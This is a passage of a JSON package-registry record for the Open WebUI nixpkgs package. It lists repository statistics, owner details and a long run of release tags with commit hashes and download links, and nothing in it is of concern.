WebUI","homepage":"https://github.com/open-webui/open-webui","licenses":"other","normalized_licenses":[],"repository_url":"https://github.com/open-webui/open-webui","keywords_array":["python"],"namespace":null,"versions_count":2,"first_release_published_at":"2026-01-26T21:25:39.217Z","latest_release_published_at":"2026-03-06T16:14:18.920Z","latest_release_number":"0.8.8","last_synced_at":"2026-03-06T16:14:19.353Z","created_at":"2026-01-26T21:25:39.027Z","updated_at":"2026-08-22T22:02:18.489Z","registry_url":"https://search.nixos.org/packages?channel=unstable\u0026query=open-webui","install_command":"nix-env -iA nixpkgs.open-webui","documentation_url":"https://github.com/NixOS/nixpkgs/blob/nixos-unstable/pkgs/by-name/op/open-webui/package.nix#L240","metadata":{"nix_attribute":"open-webui-0.8.8","position":"pkgs/by-name/op/open-webui/package.nix:240","platforms":["aarch64-linux","armv5tel-linux","armv6l-linux","armv7a-linux","armv7l-linux","i686-linux","loongarch64-linux","m68k-linux","microblaze-linux","microblazeel-linux","mips-linux","mips64-linux","mips64el-linux","mipsel-linux","powerpc-linux","powerpc64-linux","powerpc64le-linux","riscv32-linux","riscv64-linux","s390-linux","s390x-linux","x86_64-linux","x86_64-darwin","aarch64-darwin","aarch64-windows","x86_64-windows","i686-windows","i686-freebsd","x86_64-freebsd","aarch64-freebsd"],"broken":false,"insecure":false,"unfree":true,"outputs":["dist","out"]},"repo_metadata":{"id":199152863,"uuid":"701547123","full_name":"open-webui/open-webui","owner":"open-webui","description":"User-friendly AI Interface (Supports Ollama, OpenAI API, ...)","archived":false,"fork":false,"pushed_at":"2026-08-22T13:13:14.000Z","size":409036,"stargazers_count":149582,"open_issues_count":326,"forks_count":21818,"subscribers_count":651,"default_branch":"main","last_synced_at":"2026-08-22T19:45:51.996Z","etag":null,"topics":["ai","llm","llm-ui","llm-webui","llms","mcp","ollama","ollama-webui","open-webui","openai","openapi","rag","self-hosted","ui","webui"],"latest_commit_sha":null,"homepage":"https://openwebui.com","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/open-webui.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":"CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"docs/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":null,"gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":"CONTRIBUTOR_LICENSE_AGREEMENT","disclosure":null},"funding":{"github":"open-webui"}},"created_at":"2023-10-06T22:08:27.000Z","updated_at":"2026-08-22T19:12:28.000Z","dependencies_parsed_at":"2026-08-15T05:21:06.356Z","dependency_job_id":null,"html_url":"https://github.com/open-webui/open-webui","commit_stats":{"total_commits":4572,"total_committers":249,"mean_commits":18.36144578313253,"dds":0.3506124234470691,"last_synced_commit":"1d225dd804575af9ae5981528dfdce695f7f7040"},"previous_names":["ollama-webui/ollama-webui","open-webui/open-webui"],"tags_count":167,"template":false,"template_full_name":null,"purl":"pkg:github/open-webui/open-webui","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/open-webui","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36835287,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"open-webui","name":"Open WebUI","uuid":"158137808","kind":"organization","description":"On a mission to build the best AI user interface.","email":"support@openwebui.com","website":"https://openwebui.com","location":null,"twitter":"OpenWebUI","company":null,"icon_url":"https://avatars.githubusercontent.com/u/158137808?v=4","repositories_count":25,"last_synced_at":"2026-08-22T19:45:41.038Z","metadata":{"has_sponsors_listing":true,"funding":null},"html_url":"https://github.com/open-webui","funding_links":["https://github.com/sponsors/open-webui"],"total_stars":164651,"followers":5228,"following":0,"created_at":"2024-02-17T08:24:26.070Z","updated_at":"2026-08-22T19:45:41.055Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/open-webui","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/open-webui/repositories"},"tags":[{"name":"v0.11.0","sha":"f9590b8017199e56d5e953657e6498e3cef1d246","kind":"commit","published_at":"2026-07-27T09:30:03.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.11.0","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.11.0/manifests"},{"name":"v0.10.2","sha":"ecd48e2f718220a6400ecf49eafd4867a38feb10","kind":"commit","published_at":"2026-07-01T08:40:54.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.10.2","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"b711935dd57dbc223ebbf410175a8bbe7e4efafb","kind":"commit","published_at":"2026-06-29T19:38:32.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.10.1","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.10.1/manifests"},{"name":"v0.10.0","sha":"4d2e13cf2bcc451b33bb6374bea4d2163e6cc94c","kind":"commit","published_at":"2026-06-29T19:17:36.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.10.0","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.10.0/manifests"},{"name":"v0.9.6","sha":"1a97751e376e00a1897bc3679215ae1c7bd8fd42","kind":"commit","published_at":"2026-06-02T02:09:44.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.9.6","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.9.6/manifests"},{"name":"v0.9.5","sha":"3660bc00fd807deced3400a63bfa6db47811a3bb","kind":"commit","published_at":"2026-05-10T18:13:55.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.9.5","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.9.5/manifests"},{"name":"v0.9.4","sha":"f51d2b026f1b0e7283b15f093412be8b67d24770","kind":"commit","published_at":"2026-05-09T07:50:05.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.9.4","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.9.4/manifests"},{"name":"v0.9.3","sha":"adc9076d176679fd913c5dc44d0bd4d8f86d1fc3","kind":"commit","published_at":"2026-05-09T07:17:07.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.9.3","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.9.3/manifests"},{"name":"v0.9.2","sha":"8dae237a0bfdac4b7f55b463b3e2769ea4b94a0b","kind":"commit","published_at":"2026-04-24T09:56:03.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.9.2","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.9.2/manifests"},{"name":"v0.9.1","sha":"0a8a620fb6fd4c914494f56ac06475bd5f95a985","kind":"commit","published_at":"2026-04-21T10:45:24.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.9.1","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.9.1/manifests"},{"name":"v0.9.0","sha":"f31768e20e5c6b4f6da0ef657877298b359936cf","kind":"commit","published_at":"2026-04-21T07:56:01.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.9.0","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.9.0/manifests"},{"name":"v0.8.12","sha":"9bd84258d09eefe7bf975878fb0e31a5dadfe0f8","kind":"commit","published_at":"2026-03-27T00:26:39.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.8.12","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.8.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.8.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.12/manifests"},{"name":"v0.8.11","sha":"4d058a125b17eb57212af5eab98d683548d546e3","kind":"commit","published_at":"2026-03-25T22:49:59.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.8.11","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.8.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.8.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.11/manifests"},{"name":"v0.8.10","sha":"e4e69a10ec08a725bf2ab3db499ef664f2bd7570","kind":"commit","published_at":"2026-03-09T00:09:43.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.8.10","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.8.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.8.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.10/manifests"},{"name":"v0.8.9","sha":"6c159a97b7efdfdbfa262ebd26823a2d695b561d","kind":"commit","published_at":"2026-03-08T02:56:22.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.8.9","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.8.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.8.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.9/manifests"},{"name":"v0.8.8","sha":"79f04379801622181ef9c591374a285eac4e1c4d","kind":"commit","published_at":"2026-03-02T23:32:58.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.8.8","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.8/manifests"},{"name":"v0.8.7","sha":"6137f7cb7ecda49d5fa6857c5e9fa8942dda6b23","kind":"commit","published_at":"2026-03-02T01:14:08.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.8.7","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.8.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.8.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.7/manifests"},{"name":"v0.8.6","sha":"9c9a18d6d4311ff246d5d1345d94581bf25c604b","kind":"commit","published_at":"2026-03-01T21:03:55.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.8.6","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.6/manifests"},{"name":"v0.8.5","sha":"1ac3dd4a893e13803e7b889611303c4a7a5cc470","kind":"commit","published_at":"2026-02-23T09:26:21.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.8.5","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.5/manifests"},{"name":"v0.8.4","sha":"2ed3055c42ae18e3372081c18629963b0e244a62","kind":"commit","published_at":"2026-02-23T07:58:08.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.8.4","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.4/manifests"},{"name":"v0.8.3","sha":"b8112d72b95e480f946f0688bed29321b61e65af","kind":"commit","published_at":"2026-02-17T07:25:39.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.8.3","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.3/manifests"},{"name":"v0.8.2","sha":"7c7fe443289c3d0307ebbcf320fb1d895c3ee79b","kind":"commit","published_at":"2026-02-16T07:37:13.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.8.2","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.2/manifests"},{"name":"v0.8.1","sha":"883f1dda0f18fbe26aca7aed5a8804021a3685ca","kind":"commit","published_at":"2026-02-14T00:04:11.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.8.1","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.1/manifests"},{"name":"v0.8.0","sha":"7a7a25766c3dc13fa85544a93d011e00b7c0b2b4","kind":"commit","published_at":"2026-02-12T23:42:25.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.8.0","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.0/manifests"},{"name":"v0.7.2","sha":"2b26355002064228e9b671339f8f3fb9d1fafa73","kind":"commit","published_at":"2026-01-10T21:00:01.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.7.2","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.7.2/manifests"},{"name":"v0.7.1","sha":"f2a360cb87cc395a0195e1b57ff7272400db3bee","kind":"commit","published_at":"2026-01-09T20:57:39.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.7.1","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.7.1/manifests"},{"name":"v0.7.0","sha":"6adde203cd292a9e3af9c64a2ae36b603fed096a","kind":"commit","published_at":"2026-01-09T18:51:34.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.7.0","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.7.0/manifests"},{"name":"v0.6.43","sha":"a7271532f8a38da46785afcaa7e65f9a45e7d753","kind":"commit","published_at":"2025-12-22T06:03:34.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.43","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.43","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.43","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.43","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.43/manifests"},{"name":"v0.6.42","sha":"d95f533214e3fe5beb5e41ec1f349940bc4c7043","kind":"commit","published_at":"2025-12-21T21:08:58.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.42","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.42","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.42","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.42","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.42/manifests"},{"name":"v0.6.41","sha":"6f1486ffd0cb288d0e21f41845361924e0d742b3","kind":"commit","published_at":"2025-12-02T22:28:46.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.41","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.41","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.41","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.41","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.41/manifests"},{"name":"v0.6.40","sha":"140605e660b8186a7d5c79fb3be6ffb147a2f498","kind":"commit","published_at":"2025-11-25T11:01:33.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.40","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.40","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.40","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.40","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.40/manifests"},{"name":"v0.6.39","sha":"9899293f050ad50ae12024cbebee7e018acd851e","kind":"commit","published_at":"2025-11-25T10:31:34.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.39","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.39","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.39","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.39","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.39/manifests"},{"name":"v0.6.38","sha":"e3faec62c58e3a83d89aa3df539feacefa125e0c","kind":"commit","published_at":"2025-11-24T12:00:31.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.38","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.38","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.38","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.38","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.38/manifests"},{"name":"v0.6.37","sha":"fe6783c16699911c7be17392596d579333fb110c","kind":"commit","published_at":"2025-11-24T03:10:05.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.37","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.37","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.37","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.37","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.37/manifests"},{"name":"v0.6.36","sha":"e0d5de16978786b8a7538adf1efcde5258f38faf","kind":"commit","published_at":"2025-11-06T21:45:23.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.36","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.36","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.36","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.36","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.36/manifests"},{"name":"v0.6.35","sha":"e85c7f79310f351672fe967a102396b6f3f5e88b","kind":"commit","published_at":"2025-11-06T18:40:46.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.35","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.35","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.35","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.35","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.35/manifests"},{"name":"v0.6.34","sha":"9ae06a3cac140673cb93895bab37846095e71059","kind":"commit","published_at":"2025-10-16T16:55:47.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.34","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.34","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.34","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.34","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.34/manifests"},{"name":"v0.6.33","sha":"8d7d79d54b9160425fc5050b3484bec40dd3b44e","kind":"commit","published_at":"2025-10-07T21:20:27.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.33","html_url":"https://github.com/open-webu